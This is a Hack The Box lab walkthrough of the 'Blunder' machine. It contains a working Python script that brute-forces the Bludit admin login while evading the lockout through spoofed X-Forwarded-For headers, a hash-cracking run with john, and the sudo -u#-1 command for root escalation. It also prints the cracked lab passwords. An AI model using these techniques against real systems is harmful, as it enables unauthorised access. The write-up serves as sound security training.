[hackthebox]Blunder

This is a linux machine that is rated easy, in fact it is only easy when I have gotten the correct parameters to exploit the CVEs.

NMAP

This machine unlike other Linux HTB machines do not have ssh, it only has http service opened.
nmap -sV -sC -vvv -oN blunder 10.10.10.191

Nmap scan report for 10.10.10.191
Host is up, received syn-ack (0.18s latency).
Scanned at 2020-06-01 15:58:17 +08 for 29s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT   STATE  SERVICE REASON       VERSION
21/tcp closed ftp     conn-refused
80/tcp open   http    syn-ack      Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  1 15:58:46 2020 -- 1 IP address (1 host up) scanned in 30.34 seconds

Looking at the web

This is a static page and there is not much interesting at first glance.

Doing web enumeration with gobuster, I have found that there is a todo.txt.

gobuster dir -u http://10.10.10.191 -x .php,.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o ~/htb/blunder/go3 --timeout 60s -t 30

Apart from this text file, there is an admin directory which is a login page.

From the todo.txt, a username – fergus – is found.

The password is within the main page, for this I used cewl -d 2 -m 5 -w dict.txt http://10.10.10.191/ to help me generate a wordlist.

Bludit has a lockout feature which “prevents” bruteforcing, from the web I have found a python script which can be used to bypass the bruteforce protection.

Finding fergus password for bludit

This is the modified python code which is used for Blunder.

#!/usr/bin/env python3
# https://rastating.github.io/bludit-brute-force-mitigation-bypass/
import re
import requests

filepath = "/home/cyruslab/htb/blunder/dict.txt"
host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'
with open(filepath, "r") as f:
wordlist = f.read().split("\n")

for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

print('[*] Trying: {p}'.format(p=password))

headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}

data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}

login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u=username, p=password))
print()
break

Running the script found a password matched for fergus.

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

Exploit bludit

With the username and password, I am using metasploit’s module to exploit bludit version 3.9.2 vulnerability.
The version of bludit was revealed when enumerating and testing with burpsuite.

By using searchsploit the exploit can be located.

The module to exploit bludit 3.9.2 is also available in my metasploit version.

set the username and password and bludit’s ip address the exploit is executed successfully:

Get the user flag

First of all I am upgrading the shell to /bin/bash.

There are two users’ home directories:

the user flag exists in hugo directory, hence the first step is to find hugo’s password.

Searching the server I have found the password hash of hugo in users.php under this directory /var/www/bludit-3.10.0a/bl-content/databases.

With john the hash was cracked and password of hugo was found to be Password120.

$john -rules --wordlist=/usr/share/wordlists/rockyou.txt hugo.hash
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Password120      (?)
1g 0:00:00:02 DONE (2020-06-02 18:46) 0.3745g/s 6238Kp/s 6238Kc/s 6238KC/s Password125..Password1122
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

Change user to hugo and the user flag is obtained.

Privilege escalation to root

Hugo’s sudo privilege:

This configuration has a vulnerability which can be exploited.

By running /bin/bash as sudo user #-1 the root is obtained.
sudo -u#-1 /bin/bash -i

Other discovery

There are two screenshots found in shaun home folder.
sudo -u shaun /bin/bash -i, assumed as shaun

One of the two screenshots looked interesting but it is a rabbithole, because the root.txt is always randomized.